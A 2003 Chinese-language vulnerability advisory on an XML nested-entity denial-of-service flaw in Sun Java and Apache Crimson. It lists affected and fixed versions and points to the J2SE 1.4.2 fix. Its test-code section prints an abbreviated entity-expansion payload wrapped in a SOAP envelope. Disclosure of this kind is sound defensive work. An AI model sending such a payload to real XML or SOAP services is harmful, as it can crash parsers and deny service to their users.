Sun Java XML文件嵌套对象拒绝服务攻击漏洞

发布时间：2003-09-22
更新时间：2003-09-22
严重程度：高
威胁程度：远程拒绝服务
错误类型：设计错误
利用方式：服务器模式

BUGTRAQ ID：8666

受影响系统

Apache Software Foundation Crimson 1.0
Sun JRE (Linux Production Release) 1.2.2 _12
Sun JRE (Linux Production Release) 1.2.2 _015
Sun JRE (Linux Production Release) 1.2.2 _014
Sun JRE (Linux Production Release) 1.2.2 _013
Sun JRE (Linux Production Release) 1.2.2 _011
Sun JRE (Linux Production Release) 1.2.2 _010
Sun JRE (Linux Production Release) 1.2.2 _007
Sun JRE (Linux Production Release) 1.2.2 _006
Sun JRE (Linux Production Release) 1.2.2 _005
   -Debian Linux 2.2
   -MandrakeSoft Linux Mandrake 7.2
   -RedHat Linux 7.0
   -S.u.S.E. Linux 7.0
Sun JRE (Linux Production Release) 1.2.2 _004
Sun JRE (Linux Production Release) 1.2.2 _003
Sun JRE (Linux Production Release) 1.2.2
Sun JRE (Linux Production Release) 1.3 .0_05
Sun JRE (Linux Production Release) 1.3 .0_04
Sun JRE (Linux Production Release) 1.3 .0_03
Sun JRE (Linux Production Release) 1.3 .0_02
Sun JRE (Linux Production Release) 1.3 .0_01
Sun JRE (Linux Production Release) 1.3 .0
Sun JRE (Linux Production Release) 1.3.1 _07
Sun JRE (Linux Production Release) 1.3.1 _06
Sun JRE (Linux Production Release) 1.3.1 _05
Sun JRE (Linux Production Release) 1.3.1 _03
   +Macromedia ColdFusion Server MX Developer
   +Macromedia ColdFusion Server MX Enterprise
   +Macromedia ColdFusion Server MX Professional
Sun JRE (Linux Production Release) 1.3.1 _02
Sun JRE (Linux Production Release) 1.3.1 _01
Sun JRE (Linux Production Release) 1.3.1
Sun JRE (Linux Production Release) 1.4 .0_04
Sun JRE (Linux Production Release) 1.4 .0_03
Sun JRE (Linux Production Release) 1.4 .0_02
Sun JRE (Linux Production Release) 1.4
Sun JRE (Linux Production Release) 1.4.1 _03
Sun JRE (Linux Production Release) 1.4.1 _02
Sun JRE (Linux Production Release) 1.4.1 _01
   +Opera Software Opera Web Browser 7.11
Sun JRE (Linux Production Release) 1.4.1
Sun JRE (Solaris Production Release) 1.1.6
   +Sun Solaris 2.6
   +Sun Solaris 2.6 _x86
   +Sun Solaris 7.0
   +Sun Solaris 7.0 _x86
   +Sun Solaris 8.0
   +Sun Solaris 8.0 _x86
Sun JRE (Solaris Production Release) 1.1.7 B
   +Sun Solaris 2.6
   +Sun Solaris 2.6 _x86
   +Sun Solaris 7.0
   +Sun Solaris 7.0 _x86
   +Sun Solaris 8.0
   +Sun Solaris 8.0 _x86
Sun JRE (Solaris Production Release) 1.1.8 _14
Sun JRE (Solaris Production Release) 1.1.8 _13
Sun JRE (Solaris Production Release) 1.1.8 _009
Sun JRE (Solaris Production Release) 1.1.8
Sun JRE (Solaris Production Release) 1.2
Sun JRE (Solaris Production Release) 1.2.1
   +Sun Solaris 2.6
   +Sun Solaris 2.6 _x86
   +Sun Solaris 7.0
   +Sun Solaris 7.0 _x86
   +Sun Solaris 8.0
   +Sun Solaris 8.0 _x86
Sun JRE (Solaris Production Release) 1.2.2 _11
Sun JRE (Solaris Production Release) 1.2.2 _11
Sun JRE (Solaris Production Release) 1.2.2 _014
Sun JRE (Solaris Production Release) 1.2.2 _013
Sun JRE (Solaris Production Release) 1.2.2 _012
Sun JRE (Solaris Production Release) 1.2.2 _011
Sun JRE (Solaris Production Release) 1.2.2 _010
Sun JRE (Solaris Production Release) 1.2.2
Sun JRE (Solaris Production Release) 1.3 .0_05
Sun JRE (Solaris Production Release) 1.3 .0_02
Sun JRE (Solaris Production Release) 1.3
Sun JRE (Solaris Production Release) 1.3.1 _07
Sun JRE (Solaris Production Release) 1.3.1 _06
Sun JRE (Solaris Production Release) 1.3.1 _05
Sun JRE (Solaris Production Release) 1.3.1 _04
Sun JRE (Solaris Production Release) 1.3.1 _03
   +Macromedia ColdFusion Server MX Developer
   +Macromedia ColdFusion Server MX Enterprise
   +Macromedia ColdFusion Server MX Professional
Sun JRE (Solaris Production Release) 1.3.1 _02
Sun JRE (Solaris Production Release) 1.3.1 _01
Sun JRE (Solaris Production Release) 1.4 .0_04
Sun JRE (Solaris Production Release) 1.4 .0_04
Sun JRE (Solaris Production Release) 1.4 .0_03
Sun JRE (Solaris Production Release) 1.4 .0_02
Sun JRE (Solaris Production Release) 1.4 .0_01
Sun JRE (Solaris Production Release) 1.4
Sun JRE (Solaris Production Release) 1.4.1 _03
Sun JRE (Solaris Production Release) 1.4.1 _02
Sun JRE (Solaris Production Release) 1.4.1 _01
   +Opera Software Opera Web Browser 7.11
Sun JRE (Solaris Production Release) 1.4.1
Sun JRE (Windows Production Release) 1.1.8 _009
Sun JRE (Windows Production Release) 1.1.8 _008
Sun JRE (Windows Production Release) 1.1.8 _007
Sun JRE (Windows Production Release) 1.1.8
Sun JRE (Windows Production Release) 1.2
Sun JRE (Windows Production Release) 1.2.1
Sun JRE (Windows Production Release) 1.2.2 _12
Sun JRE (Windows Production Release) 1.2.2 _015
Sun JRE (Windows Production Release) 1.2.2 _014
Sun JRE (Windows Production Release) 1.2.2 _013
Sun JRE (Windows Production Release) 1.2.2 _011
Sun JRE (Windows Production Release) 1.2.2 _010
Sun JRE (Windows Production Release) 1.2.2
Sun JRE (Windows Production Release) 1.3 .0_05
Sun JRE (Windows Production Release) 1.3 .0_04
Sun JRE (Windows Production Release) 1.3 .0_02
Sun JRE (Windows Production Release) 1.3
Sun JRE (Windows Production Release) 1.3.1 _07
Sun JRE (Windows Production Release) 1.3.1 _06
Sun JRE (Windows Production Release) 1.3.1 _05
Sun JRE (Windows Production Release) 1.3.1 _04
Sun JRE (Windows Production Release) 1.3.1 _03
   +Macromedia ColdFusion Server MX Developer
   +Macromedia ColdFusion Server MX Enterprise
   +Macromedia ColdFusion Server MX Professional
Sun JRE (Windows Production Release) 1.3.1 _02
Sun JRE (Windows Production Release) 1.3.1 _01a
Sun JRE (Windows Production Release) 1.3.1 _01
Sun JRE (Windows Production Release) 1.4 .0_04
Sun JRE (Windows Production Release) 1.4 .0_03
Sun JRE (Windows Production Release) 1.4 .0_02
Sun JRE (Windows Production Release) 1.4 .0_01
Sun JRE (Windows Production Release) 1.4
Sun JRE (Windows Production Release) 1.4.1 _03
Sun JRE (Windows Production Release) 1.4.1 _02
Sun JRE (Windows Production Release) 1.4.1 _01
   +Opera Software Opera Web Browser 7.11
   +Opera Software Opera Web Browser 7.11 j
Sun JRE (Windows Production Release) 1.4.1

未影响系统

Apache Software Foundation Crimson 1.1
Sun JRE (Linux Production Release) 1.4.2
Sun JRE (Solaris Production Release) 1.4.2
Sun JRE (Windows Production Release) 1.4.2

详细描述
Sun Java在处理含有特定结构的XML文件时存在漏洞，攻击者可以使用畸形的XML文件让Sun Java解析而导致其崩溃。

测试代码
<?xml version="1.0" encoding ="UTF-8"?> <!DOCTYPE foobar[ <!ENTITY x100 "foobar"> <!ENTITY x99 "&x100;&x100;"> <!ENTITY x98 "&x99;&x99;"> ... <!ENTITY x2 "&x3;&x3;"> <!ENTITY x1 "&x2;&x2;"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV=...><SOAP-ENV:Body><ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="..."><foobar xsi:type="xsd:string">&x1;</foobar></ns1:aaa></SOAP-ENV:Body></SOAP-ENV:Envelope>

解决方案
厂商已经在新版的j2se中解决了此问题：

http://java.sun.com/j2se/

相关信息
Release Notes Version 1.4.2
http://java.sun.com/j2se/1.4.2/relnotes.html#JAXP_security

最近严重漏洞

Sun Java XML文件嵌套对象拒绝服务攻击漏洞